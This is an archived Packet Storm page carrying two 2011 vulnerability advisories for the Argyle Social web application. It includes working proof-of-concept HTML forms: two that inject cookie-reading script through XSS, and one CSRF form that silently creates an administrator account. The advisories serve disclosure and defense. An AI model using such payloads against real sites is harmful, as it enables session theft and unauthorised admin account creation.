what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Argyle Social Cross Site Request Forgery

Argyle Social Cross Site Request Forgery
Posted May 12, 2011
Authored by High-Tech Bridge SA | Site htbridge.com

Argyle Social suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 5cebebde0c1c1a49305e472575d1d2b9bcacf95d5f6770ec094c311a05d42ac5

Argyle Social Cross Site Request Forgery

Change Mirror Download
==============================
Vulnerability ID: HTB22979
Reference: http://www.htbridge.ch/advisory/multiple_xss_cross_site_scripting_vulnerabilities_in_argyle_social.html
Product: Argyle Social
Vendor: Argyle Social ( http://argylesocial.com/ )
Vulnerable Version: Current at 26/04/2011
Vendor Notification: 28 April 2011
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerabilities exists due to failure in the "settings-ajax/stream_filter_rules/create", "publish-ajax/efforts/create" scripts to properly sanitize user-supplied input in "terms", "title" variables. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

1.

<form action="http://app.argylesocial.com/settings-ajax/stream_filter_rules/create" method="post" name="main">
<input type="hidden" name="stream_filter_rule" value='{"name":"rulename","id":"","flags":["flagged"],"networks":null,"user_id":"0","terms":"XSS\"><script>alert(document.cookie)</script>"}'>
</form>
<script>
document.main.submit();
</script>


2.

<form action="http://app.argylesocial.com/publish-ajax/efforts/create" method="post" name="main">
<input type="hidden" name="effort" value='{"effort_id":"","title":"ptitle2\"><script>alert(document.cookie)</script>","url":"http://www.google.com","short":null,"campaigns":[],"primary_campaign":null,"flights":[{"glass_id":"post0","flight_id":null,"mdk":false,"source":"web interface","content_type":"twitter-status","content":{"content":"hello"},"stime":"4/30/2011 23:10:00","networks":[{"id":"1","name":"My Name","type":"twitter","url":"","avatar":"http://a2.twimg.com/profile_images/1124040897/at-twitter_reasonably_small.png"}],"waparams":{"pname":null}}]}'>
</form>
<script>
document.main.submit();
</script>


==============================
Vulnerability ID: HTB22978
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_argyle_social.html
Product: Argyle Social
Vendor: Argyle Social ( http://argylesocial.com/ )
Vulnerable Version: Current at 26/04/2011
Vendor Notification: 28 April 2011
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:
The vulnerability exists due to failure in the users creating script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:


<form action="http://app.argylesocial.com/users/create/" method="post" name="main">
<input type="hidden" name="name" value="test">
<input type="hidden" name="email" value="email@example.com">
<input type="hidden" name="code" value="usercode">
<input type="hidden" name="role" value="admin">
</form>
<script>
document.main.submit();
</script>


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close